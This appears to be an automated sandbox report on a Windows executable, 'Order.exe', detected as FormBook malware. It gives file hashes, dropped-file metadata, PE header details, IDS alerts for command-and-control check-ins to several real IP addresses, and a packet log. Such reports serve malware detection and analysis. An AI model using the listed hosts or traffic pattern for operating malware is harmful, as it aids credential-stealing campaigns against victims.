 | https://linkednnn.weebly.com/ | malicious | Unknown | 13.33.219.205
No context
No context
Process: C:\Users\user\Desktop\Order.exe
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 1216
Entropy (8bit): 5.34331486778365
Encrypted: false
SSDEEP: 24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
MD5: 1330C80CAAC9A0FB172F202485E9B1E8
SHA1: 86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
SHA-256: B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
SHA-512: 75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
Malicious: true
Reputation: high, very likely benign file
Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: data
Category: dropped
Size (bytes): 2232
Entropy (8bit): 5.379736180876081
Encrypted: false
SSDEEP: 48:tWSU4y4RQmFoUeWmfgZ9tK8NPZHUm7u1iMugeoPUyus:tLHyIFKL3IZ2KRH9OugYs
MD5: 10E0B87B6111C866FC3B823731B377C7
SHA1: B646EB7AF6029026F543BD48696E70F6551AA62B
SHA-256: B8FF8B3EB3D58E1CFA8BE5364CCAE333151F10B33CD4252E99D5165A6BE5B160
SHA-512: C42EA2C6876D6BC067CC2556597E4475E584D83BF0187EBE1D41645F481D6C4725C3BF65E4D6BAA5BDA076E2702BCE9DBE74ECF8B8D3C0A219D50A84F8AB6DAA
Malicious: false
Preview: @...e.................................,..............@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

Process: C:\Windows\SysWOW64\mshta.exe
File Type: SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category: dropped
Size (bytes): 114688
Entropy (8bit): 0.9746603542602881
Encrypted: false
SSDEEP: 192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5: 780853CDDEAEE8DE70F28A4B255A600B
SHA1: AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256: 1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512: E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious: false
Preview: SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: ASCII text, with no line terminators
Category: dropped
Size (bytes): 60
Entropy (8bit): 4.038920595031593
Encrypted: false
SSDEEP: 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA1: 6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512: 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious: false
Preview: # PowerShell test file to determine AppLocker lockdown mode

Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: ASCII text, with no line terminators
Category: dropped
Size (bytes): 60
Entropy (8bit): 4.038920595031593
Encrypted: false
SSDEEP: 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA1: 6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512: 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious: false
Preview: # PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                  File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                  Entropy (8bit):7.6799246777934105
                                                                                                                                  TrID:
                                                                                                                                  • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                                                                                  • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                                                                                  • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                                                                  • Win16/32 Executable Delphi generic (2074/23) 0.01%
                                                                                                                                  • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                                                  File name:Order.exe
                                                                                                                                  File size:814'592 bytes
                                                                                                                                  MD5:879bfdca45455cfe5b122b8ad287b393
                                                                                                                                  SHA1:a348b566aec66df4baa69cfa826d62707c871a4f
                                                                                                                                  SHA256:02253d28e37b943a2d0dbbb8e3a1b53f61d63016e6e12c2ba7f5eb2d5da348b8
                                                                                                                                  SHA512:732cedfcb0802d307e2a08edc018e68e9d585e85d315a29405a62004c54a71cc8ae13112c2a4865353b6fced7705ac34c2e108440f7080b5dc50340db11dc6f7
                                                                                                                                  SSDEEP:24576:854mEbkr3CKiq7q5JSFKIHhvJkogFGnPW:yjOK97ASDv3gFQ
                                                                                                                                  TLSH:8605E04013A9DA11E5B21BB84471D3F807BA7E9AB835D3278EDABCEB3D317465810793
                                                                                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....E................0..d............... ........@.. ....................................@................................
                                                                                                                                  Icon Hash:90cececece8e8eb0
                                                                                                                                  Entrypoint:0x4c83d6
                                                                                                                                  Entrypoint Section:.text
                                                                                                                                  Digitally signed:false
                                                                                                                                  Imagebase:0x400000
                                                                                                                                  Subsystem:windows gui
                                                                                                                                  Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                  DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                                  Time Stamp:0x990045F9 [Fri May 5 20:39:21 2051 UTC]
                                                                                                                                  TLS Callbacks:
                                                                                                                                  CLR (.Net) Version:
                                                                                                                                  OS Version Major:4
                                                                                                                                  OS Version Minor:0
                                                                                                                                  File Version Major:4
                                                                                                                                  File Version Minor:0
                                                                                                                                  Subsystem Version Major:4
                                                                                                                                  Subsystem Version Minor:0
                                                                                                                                  Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                                                                                  Instruction
                                                                                                                                  jmp dword ptr [00402000h]
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xc8381 | 0x4f | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xca000 | 0x584 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xcc000 | 0xc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0xc4740 | 0x70 | .text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0xc63dc | 0xc6400 | 8afc52290bb2194cb25a08aebe510c25 | False | 0.8809874487704918 | data | 7.687118914880025 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc | 0xca000 | 0x584 | 0x600 | 298e73bd31744f3156bb6ab8a41148ab | False | 0.4153645833333333 | data | 4.020412397226098 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0xcc000 | 0xc | 0x200 | ea0ba78a27121f1d71984e8022573a29 | False | 0.044921875 | data | 0.09800417566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_VERSION | 0xca090 | 0x2f4 | data | | | 0.44047619047619047
RT_MANIFEST | 0xca394 | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | | | 0.5489795918367347
DLL | Import
mscoree.dll | _CorExeMain
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-10-24T08:01:36.389283+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.4 | 49741 | 35.156.117.131 | 80 | TCP
2024-10-24T08:01:53.136123+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49742 | 3.33.130.190 | 80 | TCP
2024-10-24T08:01:54.800687+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49743 | 3.33.130.190 | 80 | TCP
2024-10-24T08:01:57.357112+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49746 | 3.33.130.190 | 80 | TCP
2024-10-24T08:02:00.059415+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.4 | 49752 | 3.33.130.190 | 80 | TCP
2024-10-24T08:02:14.222615+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49808 | 3.33.130.190 | 80 | TCP
2024-10-24T08:02:16.748286+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49824 | 3.33.130.190 | 80 | TCP
2024-10-24T08:02:19.405720+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49840 | 3.33.130.190 | 80 | TCP
2024-10-24T08:02:21.866748+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.4 | 49851 | 3.33.130.190 | 80 | TCP
2024-10-24T08:02:28.495447+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49881 | 206.119.82.134 | 80 | TCP
2024-10-24T08:02:31.026603+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49893 | 206.119.82.134 | 80 | TCP
2024-10-24T08:02:33.589134+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49909 | 206.119.82.134 | 80 | TCP
2024-10-24T08:02:36.136007+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.4 | 49922 | 206.119.82.134 | 80 | TCP
2024-10-24T08:02:42.042625+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49956 | 162.213.249.216 | 80 | TCP
2024-10-24T08:02:44.605479+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49967 | 162.213.249.216 | 80 | TCP
2024-10-24T08:02:47.847054+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49978 | 162.213.249.216 | 80 | TCP
2024-10-24T08:02:50.391000+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.4 | 49994 | 162.213.249.216 | 80 | TCP
2024-10-24T08:02:56.397433+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50024 | 217.160.0.231 | 80 | TCP
2024-10-24T08:02:58.870386+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50025 | 217.160.0.231 | 80 | TCP
2024-10-24T08:03:01.433060+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50026 | 217.160.0.231 | 80 | TCP
2024-10-24T08:03:04.071658+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.4 | 50027 | 217.160.0.231 | 80 | TCP
2024-10-24T08:03:10.911969+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50028 | 54.179.173.60 | 80 | TCP
2024-10-24T08:03:13.448531+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50029 | 54.179.173.60 | 80 | TCP
2024-10-24T08:03:16.745453+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50030 | 54.179.173.60 | 80 | TCP
2024-10-24T08:03:19.276704+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.4 | 50031 | 54.179.173.60 | 80 | TCP
2024-10-24T08:03:25.997357+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50032 | 3.33.130.190 | 80 | TCP
2024-10-24T08:03:27.648222+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50033 | 3.33.130.190 | 80 | TCP
2024-10-24T08:03:31.365939+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50034 | 3.33.130.190 | 80 | TCP
2024-10-24T08:03:33.752288+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.4 | 50035 | 3.33.130.190 | 80 | TCP
2024-10-24T08:03:48.262622+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50036 | 156.226.22.233 | 80 | TCP
2024-10-24T08:03:50.762469+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50037 | 156.226.22.233 | 80 | TCP
2024-10-24T08:03:53.453728+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50038 | 156.226.22.233 | 80 | TCP
2024-10-24T08:03:55.854839+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.4 | 50039 | 156.226.22.233 | 80 | TCP
2024-10-24T08:04:01.903301+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50040 | 52.20.84.62 | 80 | TCP
2024-10-24T08:04:04.442206+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50041 | 52.20.84.62 | 80 | TCP
2024-10-24T08:04:07.013442+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50042 | 52.20.84.62 | 80 | TCP
2024-10-24T08:04:09.616741+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.4 | 50043 | 52.20.84.62 | 80 | TCP
2024-10-24T08:04:15.293628+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50044 | 3.33.130.190 | 80 | TCP
2024-10-24T08:04:18.730659+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50045 | 3.33.130.190 | 80 | TCP
2024-10-24T08:04:21.276828+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50046 | 3.33.130.190 | 80 | TCP
2024-10-24T08:04:23.950321+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.4 | 50047 | 3.33.130.190 | 80 | TCP
2024-10-24T08:04:30.292422+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50048 | 142.250.186.83 | 80 | TCP
2024-10-24T08:04:32.886050+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50049 | 142.250.186.83 | 80 | TCP
2024-10-24T08:04:35.417323+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50050 | 142.250.186.83 | 80 | TCP
2024-10-24T08:04:37.964229+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.4 | 50051 | 142.250.186.83 | 80 | TCP
2024-10-24T08:04:43.597788+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50052 | 172.81.61.224 | 80 | TCP
2024-10-24T08:04:46.153041+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50053 | 172.81.61.224 | 80 | TCP
2024-10-24T08:04:48.861760+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50054 | 172.81.61.224 | 80 | TCP
2024-10-24T08:04:51.399211+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.4 | 50055 | 172.81.61.224 | 80 | TCP
2024-10-24T08:04:57.080718+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50056 | 3.33.130.190 | 80 | TCP
2024-10-24T08:05:00.514602+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50057 | 3.33.130.190 | 80 | TCP
2024-10-24T08:05:02.190581+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50058 | 3.33.130.190 | 80 | TCP
2024-10-24T08:05:04.938835+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.4 | 50059 | 3.33.130.190 | 80 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 24, 2024 08:01:35.032022953 CEST | 49741 | 80 | 192.168.2.4 | 35.156.117.131
Oct 24, 2024 08:01:35.038832903 CEST | 80 | 49741 | 35.156.117.131 | 192.168.2.4
Oct 24, 2024 08:01:35.039031982 CEST | 49741 | 80 | 192.168.2.4 | 35.156.117.131
Oct 24, 2024 08:01:35.048039913 CEST | 49741 | 80 | 192.168.2.4 | 35.156.117.131
Oct 24, 2024 08:01:35.054120064 CEST | 80 | 49741 | 35.156.117.131 | 192.168.2.4
Oct 24, 2024 08:01:36.388943911 CEST | 80 | 49741 | 35.156.117.131 | 192.168.2.4
Oct 24, 2024 08:01:36.388976097 CEST | 80 | 49741 | 35.156.117.131 | 192.168.2.4
Oct 24, 2024 08:01:36.389282942 CEST | 49741 | 80 | 192.168.2.4 | 35.156.117.131
Oct 24, 2024 08:01:36.510257959 CEST | 80 | 49741 | 35.156.117.131 | 192.168.2.4
Oct 24, 2024 08:01:36.510582924 CEST | 49741 | 80 | 192.168.2.4 | 35.156.117.131
Oct 24, 2024 08:01:36.515369892 CEST | 49741 | 80 | 192.168.2.4 | 35.156.117.131
Oct 24, 2024 08:01:36.520786047 CEST | 80 | 49741 | 35.156.117.131 | 192.168.2.4
Oct 24, 2024 08:01:51.598464966 CEST | 49742 | 80 | 192.168.2.4 | 3.33.130.190
Oct 24, 2024 08:01:51.605376005 CEST | 80 | 49742 | 3.33.130.190 | 192.168.2.4
Oct 24, 2024 08:01:51.605652094 CEST | 49742 | 80 | 192.168.2.4 | 3.33.130.190
Oct 24, 2024 08:01:51.624667883 CEST | 49742 | 80 | 192.168.2.4 | 3.33.130.190
Oct 24, 2024 08:01:51.630078077 CEST | 80 | 49742 | 3.33.130.190 | 192.168.2.4
Oct 24, 2024 08:01:53.136122942 CEST | 49742 | 80 | 192.168.2.4 | 3.33.130.190
Oct 24, 2024 08:01:53.141882896 CEST | 80 | 49742 | 3.33.130.190 | 192.168.2.4
Oct 24, 2024 08:01:53.141985893 CEST | 49742 | 80 | 192.168.2.4 | 3.33.130.190
Oct 24, 2024 08:01:54.161360979 CEST | 49743 | 80 | 192.168.2.4 | 3.33.130.190
Oct 24, 2024 08:01:54.167274952 CEST | 80 | 49743 | 3.33.130.190 | 192.168.2.4
Oct 24, 2024 08:01:54.167433023 CEST | 49743 | 80 | 192.168.2.4 | 3.33.130.190
Oct 24, 2024 08:01:54.184232950 CEST | 49743 | 80 | 192.168.2.4 | 3.33.130.190
Oct 24, 2024 08:01:54.189758062 CEST | 80 | 49743 | 3.33.130.190 | 192.168.2.4
Oct 24, 2024 08:01:54.800537109 CEST | 80 | 49743 | 3.33.130.190 | 192.168.2.4
Oct 24, 2024 08:01:54.800687075 CEST | 49743 | 80 | 192.168.2.4 | 3.33.130.190
Oct 24, 2024 08:01:55.698780060 CEST | 49743 | 80 | 192.168.2.4 | 3.33.130.190
Oct 24, 2024 08:01:55.704463959 CEST | 80 | 49743 | 3.33.130.190 | 192.168.2.4
Oct 24, 2024 08:01:56.721874952 CEST | 49746 | 80 | 192.168.2.4 | 3.33.130.190
Oct 24, 2024 08:01:56.728631973 CEST | 80 | 49746 | 3.33.130.190 | 192.168.2.4
Oct 24, 2024 08:01:56.728743076 CEST | 49746 | 80 | 192.168.2.4 | 3.33.130.190
Oct 24, 2024 08:01:56.743837118 CEST | 49746 | 80 | 192.168.2.4 | 3.33.130.190
Oct 24, 2024 08:01:56.749579906 CEST | 80 | 49746 | 3.33.130.190 | 192.168.2.4
Oct 24, 2024 08:01:56.749613047 CEST | 80 | 49746 | 3.33.130.190 | 192.168.2.4
Oct 24, 2024 08:01:56.749640942 CEST | 80 | 49746 | 3.33.130.190 | 192.168.2.4
Oct 24, 2024 08:01:56.749685049 CEST | 80 | 49746 | 3.33.130.190 | 192.168.2.4
Oct 24, 2024 08:01:56.749711990 CEST | 80 | 49746 | 3.33.130.190 | 192.168.2.4
Oct 24, 2024 08:01:56.749744892 CEST | 80 | 49746 | 3.33.130.190 | 192.168.2.4
Oct 24, 2024 08:01:56.749800920 CEST | 80 | 49746 | 3.33.130.190 | 192.168.2.4
Oct 24, 2024 08:01:56.749828100 CEST | 80 | 49746 | 3.33.130.190 | 192.168.2.4
Oct 24, 2024 08:01:56.749859095 CEST | 80 | 49746 | 3.33.130.190 | 192.168.2.4
Oct 24, 2024 08:01:57.356982946 CEST | 80 | 49746 | 3.33.130.190 | 192.168.2.4
Oct 24, 2024 08:01:57.357111931 CEST | 49746 | 80 | 192.168.2.4 | 3.33.130.190
Oct 24, 2024 08:01:58.245618105 CEST | 49746 | 80 | 192.168.2.4 | 3.33.130.190
Oct 24, 2024 08:01:58.251699924 CEST | 80 | 49746 | 3.33.130.190 | 192.168.2.4
Oct 24, 2024 08:01:59.265512943 CEST | 49752 | 80 | 192.168.2.4 | 3.33.130.190
Oct 24, 2024 08:01:59.430695057 CEST | 80 | 49752 | 3.33.130.190 | 192.168.2.4
Oct 24, 2024 08:01:59.431076050 CEST | 49752 | 80 | 192.168.2.4 | 3.33.130.190
Oct 24, 2024 08:01:59.444020987 CEST | 49752 | 80 | 192.168.2.4 | 3.33.130.190
Oct 24, 2024 08:01:59.449465990 CEST | 80 | 49752 | 3.33.130.190 | 192.168.2.4
Oct 24, 2024 08:02:00.058722973 CEST | 80 | 49752 | 3.33.130.190 | 192.168.2.4
Oct 24, 2024 08:02:00.059257984 CEST | 80 | 49752 | 3.33.130.190 | 192.168.2.4
Oct 24, 2024 08:02:00.059415102 CEST | 49752 | 80 | 192.168.2.4 | 3.33.130.190
Oct 24, 2024 08:02:00.061943054 CEST | 49752 | 80 | 192.168.2.4 | 3.33.130.190
Oct 24, 2024 08:02:00.067830086 CEST | 80 | 49752 | 3.33.130.190 | 192.168.2.4
Oct 24, 2024 08:02:13.270533085 CEST | 49808 | 80 | 192.168.2.4 | 3.33.130.190
Oct 24, 2024 08:02:13.589555025 CEST | 80 | 49808 | 3.33.130.190 | 192.168.2.4
Oct 24, 2024 08:02:13.589667082 CEST | 49808 | 80 | 192.168.2.4 | 3.33.130.190
Oct 24, 2024 08:02:13.601144075 CEST | 49808 | 80 | 192.168.2.4 | 3.33.130.190
Oct 24, 2024 08:02:13.606494904 CEST | 80 | 49808 | 3.33.130.190 | 192.168.2.4
Oct 24, 2024 08:02:14.222521067 CEST | 80 | 49808 | 3.33.130.190 | 192.168.2.4
Oct 24, 2024 08:02:14.222615004 CEST | 49808 | 80 | 192.168.2.4 | 3.33.130.190
Oct 24, 2024 08:02:15.104969025 CEST | 49808 | 80 | 192.168.2.4 | 3.33.130.190
Oct 24, 2024 08:02:15.110605955 CEST | 80 | 49808 | 3.33.130.190 | 192.168.2.4
Oct 24, 2024 08:02:16.124327898 CEST | 49824 | 80 | 192.168.2.4 | 3.33.130.190
Oct 24, 2024 08:02:16.129751921 CEST | 80 | 49824 | 3.33.130.190 | 192.168.2.4
Oct 24, 2024 08:02:16.129864931 CEST | 49824 | 80 | 192.168.2.4 | 3.33.130.190
Oct 24, 2024 08:02:16.141700983 CEST | 49824 | 80 | 192.168.2.4 | 3.33.130.190
Oct 24, 2024 08:02:16.149092913 CEST | 80 | 49824 | 3.33.130.190 | 192.168.2.4
Oct 24, 2024 08:02:16.748100996 CEST | 80 | 49824 | 3.33.130.190 | 192.168.2.4
Oct 24, 2024 08:02:16.748286009 CEST | 49824 | 80 | 192.168.2.4 | 3.33.130.190
Oct 24, 2024 08:02:17.652205944 CEST | 49824 | 80 | 192.168.2.4 | 3.33.130.190
Oct 24, 2024 08:02:17.657737970 CEST | 80 | 49824 | 3.33.130.190 | 192.168.2.4
Oct 24, 2024 08:02:18.670934916 CEST | 49840 | 80 | 192.168.2.4 | 3.33.130.190
Oct 24, 2024 08:02:18.676397085 CEST | 80 | 49840 | 3.33.130.190 | 192.168.2.4
Oct 24, 2024 08:02:18.676573992 CEST | 49840 | 80 | 192.168.2.4 | 3.33.130.190
Oct 24, 2024 08:02:18.692248106 CEST | 49840 | 80 | 192.168.2.4 | 3.33.130.190
Oct 24, 2024 08:02:18.697777987 CEST | 80 | 49840 | 3.33.130.190 | 192.168.2.4
Oct 24, 2024 08:02:18.697792053 CEST | 80 | 49840 | 3.33.130.190 | 192.168.2.4
Oct 24, 2024 08:02:18.697808981 CEST | 80 | 49840 | 3.33.130.190 | 192.168.2.4
Oct 24, 2024 08:02:18.697817087 CEST | 80 | 49840 | 3.33.130.190 | 192.168.2.4
Oct 24, 2024 08:02:18.697824001 CEST | 80 | 49840 | 3.33.130.190 | 192.168.2.4
Oct 24, 2024 08:02:18.697830915 CEST | 80 | 49840 | 3.33.130.190 | 192.168.2.4
Oct 24, 2024 08:02:18.697841883 CEST | 80 | 49840 | 3.33.130.190 | 192.168.2.4
